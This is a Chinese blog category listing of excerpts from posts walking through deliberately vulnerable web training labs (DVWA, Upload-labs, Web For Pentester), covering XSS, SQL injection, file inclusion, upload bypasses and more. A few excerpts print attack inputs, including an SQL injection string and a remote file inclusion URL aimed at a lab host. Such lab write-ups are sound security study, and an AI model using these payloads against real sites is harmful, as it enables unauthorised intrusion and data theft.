随笔分类 -  Web基础靶场

DVWA、SQL-labs、Upload-labs、Web For Pentester等Web常见靶场、常见漏洞
摘要:转载于 学习与:3. php反序列化从入门到放弃(入门篇) PHP中的类和对象 类用来定义属性、方法。对象直接把类进行实例化,直接拿来用,使用的时候交给类进行处理。 可以看以下示例: <?php // 定义一个 message 类 class message{ // 定义类属性(类似于变量), pu 阅读全文
posted @ 2022-06-02 21:05 Junglezt 阅读(456) 评论(0) 推荐(1) 编辑
摘要:存储型XSS,顾名思义,就是会传入数据库,长久的使用,常见为留言板,用户信息资料。 LOW 审计源码 <?php // 是否提交 btnSign if( isset( $_POST[ 'btnSign' ] ) ) { // 获取输入的mtxMessage和txtName // trim() 首位去 阅读全文
posted @ 2022-06-02 11:12 Junglezt 阅读(242) 评论(0) 推荐(0) 编辑
摘要:反射性XSS,是非持久性,也是最常见的XSS,通过解析传入前段页面,常见为交互式输入框 LOW 审计源码 <?php // 发送请求头 header ("X-XSS-Protection: 0"); // 判断是否传入是否通过 name 键名传参 if( array_key_exists( "nam 阅读全文
posted @ 2022-06-02 09:42 Junglezt 阅读(78) 评论(0) 推荐(0) 编辑
摘要:XSS(Cross Site Scripting),跨站脚本攻击,能使攻击者在页面嵌入一些脚本代码,用户再访问,被诱导点击时,执行恶意脚本,常见为javascript,也有Flash、VBscript,常见于盗取cookie。 DOM型XSS,是利用DOM树,DOM树就是HTML之间的标签,将标签闭 阅读全文
posted @ 2022-06-01 15:43 Junglezt 阅读(1093) 评论(0) 推荐(0) 编辑
摘要:在登录服务器之后,服务器会返回给用户一个会话(session),这个会话只会存在一段时间,拥有这个会话下次登录就不用输入密码就可以登录到网站,如果返回的这个会话很弱,容易被猜解到,就很不安全,照成会话劫持,直接登录到被劫持的用户,照成很大的隐患,类似于cookie劫持。 LOW 审计源码 <?php 阅读全文
posted @ 2022-05-31 19:46 Junglezt 阅读(227) 评论(0) 推荐(0) 编辑
摘要:盲注同于union select查询注入,盲注只能得到数据库回显的正确和错误,利用返回的正确和错误一个一个判断。 LOW 审计源码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // 获取 id $id = $_GET[ 'id' ]; // 定义存在为 fals 阅读全文
posted @ 2022-05-31 11:49 Junglezt 阅读(129) 评论(0) 推荐(0) 编辑
摘要:sql注入是典型、常见的Web漏洞之一,现在在网络中也可能存在,不过大多数为SQL盲注。 攻击者通过恶意的SQL语句来破坏SQL查询语句,达到数据库泄露的目的 LOW 审计源码 <?php // 判断是否提交 if( isset( $_REQUEST[ 'Submit' ] ) ) { // 获取传 阅读全文
posted @ 2022-05-30 16:41 Junglezt 阅读(213) 评论(0) 推荐(0) 编辑
摘要:Insecure CAPTCHA,意思为不安全的验证码 全称为Completely Automated Public Turing Test to Tell Computers and Humans Apart,意思是全自动公共图灵测试,区分计算机和人类 顾名思义,想通过验证码拦截我们的操作,绕过即 阅读全文
posted @ 2022-05-30 09:00 Junglezt 阅读(325) 评论(0) 推荐(0) 编辑
摘要:文件上传是很危险的漏洞,攻击者上传木马到服务器,可以获取服务器的操作权限 LOW 审计源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // 定义 文件上传位置,这里的 DVWA_WEB_PAGE_TO_ROOT 是作者自定义的一个变量 $target_pat 阅读全文
posted @ 2022-05-24 13:41 Junglezt 阅读(276) 评论(0) 推荐(0) 编辑
摘要:文件包含漏洞,当我们在一个代码文件想要引入、嵌套另一个代码文件的时候,就是文件包含。 常见的文件包含函数有include require等函数。 这两个函数的区别就是include在包含文件不存在时php代码会继续往下执行,而require则终止php代码的执行 Include:包含一个文件 Inc 阅读全文
posted @ 2022-05-18 21:35 Junglezt 阅读(215) 评论(0) 推荐(0) 编辑
摘要:csrf(Cross-site request forgery)跨站请求伪造:攻击者诱导用户访问第三方网站,在第三方网站中携带恶意代码,向被攻击者发送请求 原理可以这样来说 用户在访问了一个后台管理网站后,例如用户更改密码,但是更改密码需要登录认证的,用户在登录后,浏览器会保存认证一段时间,叫做co 阅读全文
posted @ 2022-05-13 15:16 Junglezt 阅读(157) 评论(0) 推荐(0) 编辑
摘要:命令执行漏洞,顾名思义,服务端在进行一些网站的操作、管理的时候,需要调用系统命令,如果对传入的命令参数没有进行一些过滤,可以直接执行服务器系统的命令终端 LOW 审计源码 <?php // 判断是否提交了 Submit if( isset( $_POST[ 'Submit' ] ) ) { // 获 阅读全文
posted @ 2022-05-12 11:39 Junglezt 阅读(553) 评论(0) 推荐(0) 编辑
摘要:暴力破解漏洞,没有对登录框做登录限制,攻击者可以不断的尝试暴力枚举用户名和密码 LOW 审计源码 <?php // 通过GET请求获取Login传参, // isset判断一个变量是否已设置,判断方法是变量是否为null if( isset( $_GET[ 'Login' ] ) ) { // 获取 阅读全文
posted @ 2022-05-10 14:10 Junglezt 阅读(135) 评论(0) 推荐(0) 编辑
摘要:DVWA是一个新手练习Web安全很好的测试平台,官网下载请见https://dvwa.co.uk/ 想要练习,首先需要搭建,对于小白来说,搭建一个平台可能有一点点费劲,网上有很多大佬的教程,这里我总结一些我的搭建过程 只需要安装phpstudy然后将下载的dvwa压缩包解压到phpstudy安装目录 阅读全文
posted @ 2022-05-08 16:00 Junglezt 阅读(353) 评论(0) 推荐(0) 编辑
摘要:File include(文件包含) Example 1 没有任何过滤 审计源码 没有对我们传参的page进行任何过滤,payload如下 http://172.16.1.104/fileincl/example1.php?page=http://172.16.1.102/info.txt 本机in 阅读全文
posted @ 2022-04-18 14:59 Junglezt 阅读(92) 评论(2) 推荐(1) 编辑
摘要:SQL injections Example 1 典型的SQL注入 name=root' or 1=1 %23 直接执行就可以导出所有用户 查看后端的源码 观察到,我们传入入的name中,传入就成为了'root',所以我们root' %23就是root' #可以闭合成功 这里由于后面也有一个',所以 阅读全文
posted @ 2022-04-16 15:49 Junglezt 阅读(109) 评论(0) 推荐(0) 编辑
摘要:Web For Pentester是集成了一些简单的Web常见漏洞的靶场,其中有常见的XSS 文件上传 SQL注入 文件包含等常见漏洞,类似于DVWA Web For Pentester搭建 Web For Pentester官方直接提供了一个ISO的镜像文件 下载地址:https://www.pe 阅读全文
posted @ 2022-04-15 11:29 Junglezt 阅读(969) 评论(0) 推荐(0) 编辑
摘要:Pass-18 条件竞争 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file 阅读全文
posted @ 2022-04-09 15:22 Junglezt 阅读(298) 评论(0) 推荐(0) 编辑
摘要:Pass-17 审计源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name'] 阅读全文
posted @ 2022-04-09 11:00 Junglezt 阅读(584) 评论(0) 推荐(0) 编辑
摘要:Pass12 GET00%截断 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); // 定义一个允许上传文件的数组 $file_ext = s 阅读全文
posted @ 2022-04-08 15:04 Junglezt 阅读(270) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示